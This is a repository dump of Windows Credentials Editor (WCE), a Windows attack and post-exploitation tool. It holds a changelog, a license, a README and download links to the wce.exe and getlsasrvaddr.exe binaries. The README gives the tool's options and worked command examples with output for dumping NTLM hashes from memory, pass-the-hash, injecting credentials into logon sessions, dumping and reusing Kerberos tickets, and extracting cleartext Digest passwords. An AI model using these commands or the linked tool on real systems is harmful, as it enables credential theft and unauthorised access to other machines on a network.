├── Changelog ├── LICENSE.txt ├── README.md ├── getlsasrvaddr.exe └── wce.exe /Changelog: -------------------------------------------------------------------------------- 1 | Changelog for Windows Credentials Editor (WCE) 32-bit version 2 | 3 | version 1.3beta: 4 | March 8, 2012 5 | -Bug fixes 6 | -Extended support to obtain NTLM hashes without code injection 7 | -Added feature to dump login cleartext passwords stored by the Digest Authentication package 8 | 9 | 10 | -------------------------------------------------------------------------------- /LICENSE.txt: -------------------------------------------------------------------------------- 1 | # Copyright (c) 2010,2011,2012 Hernan Ochoa and Amplia Security. 2 | # All rights reserved. 3 | # 4 | # Unless you have express writen permission from the Copyright Holder, any 5 | # use of or distribution of this software or portions of it, including, but not 6 | # limited to, reimplementations, modifications and derived work of it, in 7 | # either source code or any other form, as well as any other software using or 8 | # referencing it in any way, may NOT be sold for commercial gain, must be 9 | # covered by this very same license, and must retain this copyright notice and 10 | # this license. 11 | # Neither the name of the Copyright Holder nor the names of its contributors 12 | # may be used to endorse or promote products derived from this software 13 | # without specific prior written permission. 14 | # 15 | # THERE IS NO WARRANTY FOR THE SOFTWARE, TO THE EXTENT PERMITTED BY APPLICABLE 16 | # LAW. EXCEPT WHEN OTHERWISE STATED IN WRITING THE COPYRIGHT HOLDERS AND/OR 17 | # OTHER PARTIES PROVIDE THE SOFTWARE "AS IS" WITHOUT WARRANTY OF ANY KIND, 18 | # EITHER EXPRESSED OR IMPLIED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED 19 | # WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. THE 20 | # ENTIRE RISK AS TO THE QUALITY AND PERFORMANCE OF THE SOFTWARE IS WITH YOU. 21 | # SHOULD THE SOFTWARE PROVE DEFECTIVE, YOU ASSUME THE COST OF ALL NECESSARY 22 | # SERVICING, REPAIR OR CORRECTION. 23 | # 24 | # IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING WILL 25 | # ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MAY MODIFY AND/OR REDISTRIBUTE 26 | # THE SOFTWARE AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES, INCLUDING ANY 27 | # GENERAL, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING OUT OF THE USE 28 | # OR INABILITY TO USE THE SOFTWARE (INCLUDING BUT NOT LIMITED TO LOSS OF DATA OR 29 | # DATA BEING RENDERED INACCURATE OR LOSSES SUSTAINED BY YOU OR THIRD PARTIES OR 30 | # A FAILURE OF THE SOFTWARE TO OPERATE WITH ANY OTHER SOFTWARE), EVEN IF SUCH 31 | # HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE POSSIBILITY OF SUCH DAMAGES. 32 | # 33 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | Windows Credentials Editor v1.3beta (32-bit) 2 | (c) 2010, 2011, 2012 Amplia Security, Hernan Ochoa 3 | written by: hernan@ampliasecurity.com 4 | http://www.ampliasecurity.com 5 | ------------------------------------------------------------- 6 | 7 | Abstract 8 | ---------- 9 | 10 | Windows Credentials Editor (WCE) v1.3beta allows you to 11 | 12 | NTLM authentication: 13 | 14 | * List logon sessions and add, change, list and delete associated credentials (e.g.: LM/NT hashes) 15 | * Perform pass-the-hash on Windows natively 16 | * Obtain NT/LM hashes from memory (from interactive logons, services, remote desktop connections, etc.) which can be 17 | used to authenticate to other systems. WCE can perform this task without injecting code, just by reading and decrypting information stored in Windows internal memory structures. It also has the capability to automatically switch to code injection when the aforementioned method cannot be performed 18 | 19 | Kerberos authentication: 20 | 21 | * Dump Kerberos tickets (including the TGT) stored in Windows machines 22 | * Reuse/Load those tickets on another Windows machines, to authenticate to other systems and services 23 | * Reuse/Load those tickets on *Unix machines, to authenticate to other systems and services 24 | 25 | Digest Authentication: 26 | 27 | * Obtain cleartext passwords entered by the user when logging into a Windows system, and stored by the Windows Digest Authentication security package 28 | 29 | 30 | Supported Platforms 31 | ------------------- 32 | Windows Credentials Editor supports Windows XP, 2003, Vista, 7 and 2008. 33 | 34 | 35 | Requirements 36 | ------------- 37 | This tool requires administrator privileges to dump and add/delete/change NTLM credentials, and to dump cleartext passwords stored by the Windows Digest Authentication security package. 38 | 39 | Kerberos tickets can be obtained as a normal user although administrator privileges might be required to obtain session keys depending on the system's configuration. 40 | 41 | Please remember this is an attack and post-exploitation tool. 42 | 43 | Options 44 | -------- 45 | Windows Credentials Editor provides the following options: 46 | 47 | Options: 48 | -l List logon sessions and NTLM credentials (default). 49 | -s Changes NTLM credentials of current logon session. 50 | Parameters: :::. 51 | -r Lists logon sessions and NTLM credentials indefinitely. 52 | Refreshes every 5 seconds if new sessions are found. 53 | Optional: -r. 54 | -c Run in a new session with the specified NTLM credentials. 55 | Parameters: . 56 | -e Lists logon sessions NTLM credentials indefinitely. 57 | Refreshes every time a logon event occurs. 58 | -o saves all output to a file. 59 | Parameters: . 60 | -i Specify LUID instead of use current logon session. 61 | Parameters: . 62 | -d Delete NTLM credentials from logon session. 63 | Parameters: . 64 | -a Use Addresses. 65 | Parameters: 66 | -f Force 'safe mode'. 67 | -g Generate LM & NT Hash. 68 | Parameters: . 69 | -K Dump Kerberos tickets to file (unix & 'windows wce' form 70 | at) 71 | -k Read Kerberos tickets from file and insert into Windows 72 | cache 73 | -w Dump cleartext passwords stored by the digest authentication package 74 | -v verbose output. 75 | 76 | Examples: 77 | 78 | * List current logon sessions 79 | 80 | C:\>wce -l 81 | WCE v1.0 (Windows Credentials Editor) - (c) 2010 Amplia Security - by Hernan Ochoa (hernan@ampliasecurity.com) 82 | Use -h for help. 83 | 84 | meme:meme:11111111111111111111111111111111:11111111111111111111111111111111 85 | 86 | * List current logon sessions with verbose output enabled 87 | 88 | C:\>wce -l -v 89 | WCE v1.0 (Windows Credentials Editor) - (c) 2010 Amplia Security - by Hernan Ochoa (hernan@ampliasecurity.com) 90 | Use -h for help. 91 | 92 | Current Logon Session LUID: 00064081h 93 | Logon Sessions Found: 8 94 | WIN-REK2HG6EBIS\auser:NTLM 95 | LUID:0006409Fh 96 | WIN-REK2HG6EBIS\auser:NTLM 97 | LUID:00064081h 98 | NT AUTHORITY\ANONYMOUS LOGON:NTLM 99 | LUID:00019137h 100 | NT AUTHORITY\IUSR:Negotiate 101 | LUID:000003E3h 102 | NT AUTHORITY\LOCAL SERVICE:Negotiate 103 | LUID:000003E5h 104 | WORKGROUP\WIN-REK2HG6EBIS$:Negotiate 105 | LUID:000003E4h 106 | \:NTLM 107 | LUID:0000916Ah 108 | WORKGROUP\WIN-REK2HG6EBIS$:NTLM 109 | LUID:000003E7h 110 | 111 | 00064081:meme:meme:11111111111111111111111111111111:11111111111111111111111111111111 112 | 113 | * Change NTLM credentials associated with current logon session 114 | 115 | C:\>wce -s auser:adomain:99999999999999999999999999999999:99999999999999999999999999999999 116 | WCE v1.0 (Windows Credentials Editor) - (c) 2010 Amplia Security - by Hernan Ochoa (hernan@ampliasecurity.com) 117 | Use -h for help. 118 | 119 | Changing NTLM credentials of current logon session (00064081h) to: 120 | Username: auser 121 | domain: admin 122 | LMHash: 99999999999999999999999999999999 123 | NTHash: 99999999999999999999999999999999 124 | NTLM credentials successfully changed! 125 | 126 | * Add/Change NTLM credentials of a logon session (not the current one) 127 | 128 | C:\>wce -i 3e5 -s auser:adomain:99999999999999999999999999999999:99999999999999999999999999999999 129 | WCE v1.0 (Windows Credentials Editor) - (c) 2010 Amplia Security - by Hernan Och 130 | oa (hernan@ampliasecurity.com) 131 | Use -h for help. 132 | 133 | Changing NTLM credentials of logon session 000003E5h to: 134 | Username: auser 135 | domain: admin 136 | LMHash: 99999999999999999999999999999999 137 | NTHash: 99999999999999999999999999999999 138 | NTLM credentials successfully changed! 139 | 140 | * Delete NTLM credentials associated with a logon session 141 | 142 | C:\>wce -d 3e5 143 | WCE v1.0 (Windows Credentials Editor) - (c) 2010 Amplia Security - by Hernan Ochoa (hernan@ampliasecurity.com) 144 | Use -h for help. 145 | 146 | NTLM credentials successfully deleted! 147 | 148 | * Run WCE indefinitely, waiting for new credentials/logon sessions. 149 | Refresh is performed every time a logon event is registered in the Event Log. 150 | 151 | C:\>wce -e 152 | 153 | * Run WCE indefinitely, waiting for new credentials/logon sessions 154 | Refresh is every 5 seconds by default. 155 | 156 | C:\>wce -r 157 | 158 | * Run WCE indefinitely, waiting for new credentials/logon sessions, but refresh every 1 second (by default wce refreshes very 5 seconds) 159 | 160 | C:\>wce -r5 161 | 162 | 163 | * Generate LM & NT Hash. 164 | 165 | C:\>wce -g test 166 | 167 | WCE v1.2 (Windows Credentials Editor) - (c) 2010,2011 Amplia Security - by Herna 168 | n Ochoa (hernan@ampliasecurity.com) 169 | Use -h for help. 170 | 171 | Password: test 172 | Hashes: 01FC5A6BE7BC6929AAD3B435B51404EE:0CB6948805F797BF2A82807973B89537 173 | 174 | * Dump Kerberos tickets to file (unix & 'windows wce' format) 175 | 176 | C:\>wce -K 177 | WCE v1.2 (Windows Credentials Editor) - (c) 2010,2011 Amplia Security - by Herna 178 | n Ochoa (hernan@ampliasecurity.com) 179 | Use -h for help. 180 | 181 | Converting and saving TGT in UNIX format to file wce_ccache... 182 | Converting and saving tickets in Windows WCE Format to file wce_krbtkts.. 183 | 5 kerberos tickets saved to file 'wce_ccache'. 184 | 5 kerberos tickets saved to file 'wce_krbtkts'. 185 | Done! 186 | 187 | * Read Kerberos tickets from file and insert into Windows cache 188 | 189 | C:\>wce -k 190 | WCE v1.2 (Windows Credentials Editor) - (c) 2010,2011 Amplia Security - by Herna 191 | n Ochoa (hernan@ampliasecurity.com) 192 | Use -h for help. 193 | 194 | Reading kerberos tickets from file 'wce_krbtkts'... 195 | 5 kerberos tickets were added to the cache. 196 | Done! 197 | 198 | * Dump cleartext passwords stored by the Digest Authentication package 199 | 200 | C:\>wce -w 201 | WCE v1.3beta (Windows Credentials Editor) - (c) 2010,2011,2012 Amplia Security - 202 | by Hernan Ochoa (hernan@ampliasecurity.com) 203 | Use -h for help. 204 | 205 | test\MYDOMAIN:mypass1234 206 | NETWORK SERVICE\WORKGROUP:test 207 | 208 | 209 | 210 | GETLSASRVADDR.EXE 211 | ----------------- 212 | This tool can be used to obtain automatically needed addresses for WCE 213 | to be able to read logon sessions and NTLM credentials from memory. 214 | 215 | Addresses obtained can then be used with WCE using the -A switch. 216 | 217 | This tool requires the dlls symsrv.dll and dbghelp.dll available from the 218 | "Debugging Tools for Windows" package. 219 | 220 | 221 | Additional Information 222 | ---------------------- 223 | 224 | * http://www.ampliasecurity.com/research.html 225 | * http://www.ampliasecurity.com/research/wcefaq.html 226 | * http://www.ampliasecurity.com/research/WCE_Internals_RootedCon2011_ampliasecurity.pdf 227 | * http://www.ampliasecurity.com/research/wce12_uba_ampliasecurity_eng.pdf 228 | 229 | 230 | -------------------------------------------------------------------------------- /getlsasrvaddr.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/returnvar/wce/2762cc715e783b296e665d9e76c50c6c04a3cf1e/getlsasrvaddr.exe -------------------------------------------------------------------------------- /wce.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/returnvar/wce/2762cc715e783b296e665d9e76c50c6c04a3cf1e/wce.exe --------------------------------------------------------------------------------